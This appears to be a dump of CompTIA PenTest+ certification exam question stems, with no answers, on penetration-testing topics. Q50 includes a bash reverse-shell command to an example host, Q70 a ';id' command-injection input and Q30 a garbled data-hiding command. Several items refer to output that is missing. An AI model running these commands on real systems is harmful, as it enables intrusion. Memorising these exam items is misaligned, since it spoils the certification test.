CompTIA PenTest+ Certification Exam PT0-001 Updated Questions V11.02 Online Released

1. In which of the following scenarios would a tester perform a Kerberoasting attack?

2. A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.

Which of the following controls would BEST mitigate the vulnerability?

3. A penetration tester is performing an annual security assessment for a repeat client. The tester finds indicators of previous compromise.

Which of the following would be the most logical steps to follow NEXT?

4. A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses.

Which of the following is the MOST efficient to utilize?

5. After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester's workstation.

Which of the following can be used to escape the limited shell and create a fully functioning TTY?

6. While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?

7. A penetration tester has run multiple vulnerability scans against a target system.

Which of the following would be unique to a credentialed scan?

8. At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server.

Which of the following BEST describes the technique that was used to obtain this information?

9. When performing compliance-based assessments, which of the following is the MOST important Key consideration?

10. A penetration tester runs the following on a machine:

Which of the following will be returned?

11. After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”

-sr Cxr -x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strmp

GLINC _2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

12. An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing.

Which of the following is MOST likely preventing proxying of all traffic?

13. Which of the following excerpts would come from a corporate policy?

14. A client asks a penetration tester to add more addresses to a test currently in progress.

Which of the following would defined the target list?

15. A company planned for and secured the budget to hire a consultant to perform a web application penetration test.

Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

✑ Code review

✑ Updates to firewall settings

Which of the following has occurred in this situation?

16. A penetration tester wants to check manually if a “ghost” vulnerability exists in a system.

Which of the following methods is the correct way to validate the vulnerability?

17. A penetration tester is performing a validation scan after an organization remediated a vulnerability on port 443.

The penetration tester observes the following output:

Which of the following has MOST likely occurred?

18. A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities.

Under such circumstances, which of the following would be the BEST suggestion for the client?

19. During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function.

Which of the following mitigations is BEST for the consultant to conduct?

20. Which of the following is the purpose of an NDA?

21. After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host.

Which of the following is the MOST likely cause?

22. A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application.

Before beginning to test the application, which of the following should the assessor request from the organization?

23. DRAG DROP

A technician is reviewing the following report.

Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for each vulnerability that is a false positive.

24. A tester has determined that null sessions are enabled on a domain controller.

Which of the following attacks can be performed to leverage this vulnerability?

25. A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system.

Which of the following commands should the tester run on the compromised system?

26. A constant wants to scan all the TCP Pots on an identified device.

Which of the following Nmap switches will complete this task?

27. While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

28. Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

29. Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.

Which of the following BEST describes the reasoning for this?

30. During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:

c: creditcards.db>c:winitsystem32calc.exe:creditcards.db

Which of the following file system vulnerabilities does this command take advantage of?

31. An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack.

Which of the following actions should the penetration tester take?

32. After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine.

Which of the following methods would be MOST easily detected?

33. A penetration tester is scanning a network for SSH and has a list of provided targets.

Which of the following Nmap commands should the tester use?

34. After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation.

Which of the following is the MOST likely explanation of what happened?

35. In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

36. While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path.

To exploit this vulnerability, which of the following criteria must be met?

37. A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1.

Immediately after running the command below, the penetration tester’s SSH connection to the testing platform drops:

Which of the following ettercap commands should the penetration tester use in the future to

perform ARP spoofing while maintaining a reliable connection?

38. A penetration tester successfully exploits a system, receiving a reverse shell.

Which of the following is a Meterpreter command that is used to harvest locally stored credentials?

39. A penetration tester is performing a wireless penetration test.

Which of the following are some vulnerabilities that might allow the penetration tester to easily and quickly access a WPA2-protected access point?

40. Which of the following is the reason why a penetration tester would run the chkconfig --del service name command at the end of an engagement?

41. A client requests that a penetration tester emulate a help desk technician who was recently laid off.

Which of the following BEST describes the abilities of the threat actor?

42. A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication.

Which of the following attacks is MOST likely to succeed in creating a physical effect?

43. A penetration tester wants to check manually if a “ghost” vulnerability exists in a system.

Which of the following methods is the correct way to validate the vulnerability?

44. A penetration tester calls human resources and begins asking open-ended questions.

Which of the following social engineering techniques is the penetration tester using?

45. Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

46. A company has engaged a penetration tester to perform an assessment for an application that resides in the company’s DMZ.

Prior to conducting testing, in which of the following solutions should the penetration tester’s IP address be whitelisted?

47. During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network.

Which of the following tools could be used to impersonate network resources and collect authentication requests?

48. A client’s systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory.

Which of the following is the penetration tester’s BEST course of action?

49. A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information.

Which of the following is the MOST effective way to notify management of this finding and its importance?

50. A tester intends to run the following command on a target system:

bash -i >& /dev/tcp/10.2.4.6/443 0> &1

Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

51. Which of the following has a direct and significant impact on the budget of the security assessment?

52. During an internal network penetration test the tester is able to compromise a Windows system and recover the NTLM hash for a local wrltsrnAdrain account Attempting to recover the plaintext password by cracking the hash has proved to be unsuccessful, and the tester has decided to try a pass-the-hash attack to see if the credentials are reused on other in-scope systems Using the Medusa tool the tester attempts to authenticate to a list of systems, including the originally compromised host, with no success Given the output below:

Which of the following Medusa commands would potentially provide better results?

53. A client has scheduled a wireless penetration test.

Which of the following describes the scoping target information MOST likely needed before testing can begin?

54. Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?

55. A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

56. DRAG DROP

Performance based

You are a penetration Inter reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

57. A senior employee received a suspicious email from another executive requesting an urgent wire transfer.

Which of the following types of attacks is likely occurring?

58. Black box penetration testing strategy provides the tester with:

59. Which of the following is the MOST comprehensive type of penetration test on a network?

60. When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client’s systems?

61. A tester has captured a NetNTLMv2 hash using Responder.

Which of the following commands will allow the tester to crack the hash using a mask attack?

62. CORRECT TEXT

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part1

Part2

63. Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

64. Which of the following tools is used to perform a credential brute force attack?

65. A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals.

Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

66. A file contains several hashes.

Which of the following can be used in a pass-the-hash attack?

67. A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network.

Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?

68. A penetration tester obtained access to an internal host of a given target.

Which of the following is the BEST tool to retrieve the passwords of users of the machine exploiting a well-knows architecture flaw of the Windows OS?

69. A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles.

For which of the following types of attack would this information be used?

70. A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

Based on the response, which of the following vulnerabilities exists?

71. A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes.

Which of the following has MOST likely occurred?

72. A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:

Which of the following should be performed to escalate the privileges?

73. A client needs to be PCI compliant and has external-facing web servers.

Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

74. A consultant is identifying versions of Windows operating systems on a network.

Which of the following Nmap commands should the consultant run?

75. Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO)

76. An SMB server was discovered on the network, and the penetration tester wants to see if the server it vulnerable.

Which of the following is a relevant approach to test this?

77. A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope.

The penetration tester is not receiving any response on the command:

nmap 100.100/1/0-125

Which of the following commands would be BEST to return results?

78. A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10.

Which of the following would accomplish this task?

79. Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

80. An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.

Which of the following attack vectors would the attacker MOST likely use?